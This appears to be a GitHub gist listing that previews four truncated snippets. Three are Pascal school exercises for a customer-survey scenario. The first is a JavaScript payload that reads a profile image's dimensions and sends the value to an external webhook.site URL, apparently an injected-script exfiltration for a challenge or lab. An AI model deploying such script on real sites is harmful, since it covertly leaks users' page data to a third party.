This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function() { | |
// Usamos un try/catch por si la imagen no carga a tiempo | |
try { | |
const img = document.querySelector('img[src="/profile-pic"]'); | |
const tempImage = new Image(); | |
tempImage.onload = function() { | |
const level = this.naturalWidth * this.naturalHeight; | |
// REEMPLAZA CON TU NUEVO WEBHOOK | |
fetch('https://webhook.site/95acbc83-95c2-4a27-b14e-77813df6c636/?level=' + level); | |
}; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
program Escenario6B; | |
uses crt; | |
var | |
condicion,fechaOp,calServ,calCompra,motivo,motivoNoVolver,segurencias: string; | |
probIdent,ultCompra,opcion: char; | |
contP1, contP2, contP3, contP4, contP5,mas1Anio,cantClientes,mayor: integer; | |
porcentaje : real; | |
PROCEDURE mostrarDatos(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ACCION ESCENARIO_6 ES | |
USOS crt, sysutils; //(librerias de pascal) | |
TIPOS | |
fecha = REGISTRO | |
anio : N(4); | |
mes : 1..12; | |
dia : 1..31; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
program ESCENARIO6; | |
USES crt, sysutils; | |
TYPE | |
fecha = record | |
anio : integer; | |
mes : 1..12; | |
dia : 1..31; | |
end; |